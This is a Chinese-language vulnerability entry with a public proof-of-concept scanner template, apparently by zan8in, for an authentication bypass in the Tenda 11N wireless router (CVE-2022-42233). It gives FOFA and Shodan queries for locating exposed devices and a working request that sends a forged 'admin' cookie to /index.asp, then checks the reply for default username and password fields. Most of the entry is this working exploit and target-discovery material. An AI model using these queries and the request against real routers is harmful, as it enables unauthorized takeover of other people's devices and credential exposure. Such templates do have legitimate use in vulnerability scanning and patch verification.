漏洞描述
Tenda 11N无线路由器由于只验证Cookie,导致任意用户伪造Cookie即可进入后台
FOFA: app="TENDA-11N无线路由器"
FOFA: product=="Tenda-11N-Wireless-AP"
SHODAN: http.title:"Tenda 11N"
tenda-11n-cookie-unauth-access: Tenda 11N无线路由器 Cookie 越权访问漏洞
PoC代码[已公开]
id: tenda-11n-cookie-unauth-access
info:
name: Tenda 11N无线路由器 Cookie 越权访问漏洞
author: zan8in
severity: high
description: |
Tenda 11N无线路由器由于只验证Cookie,导致任意用户伪造Cookie即可进入后台
FOFA: app="TENDA-11N无线路由器"
FOFA: product=="Tenda-11N-Wireless-AP"
SHODAN: http.title:"Tenda 11N"
reference:
- https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-42233
tags: cve,cve2022,tenda,auth-bypass,router,iot
created: 2023/06/16
rules:
r0:
request:
method: GET
path: /index.asp
headers:
Cookie: admin:language=cn
expression: response.status == 200 && response.body.bcontains(b'<title>TENDA') && response.body.bcontains(b'def_PUN') && response.body.bcontains(b'def_PPW') && response.body.bcontains(b'def_WANT')
expression: r0()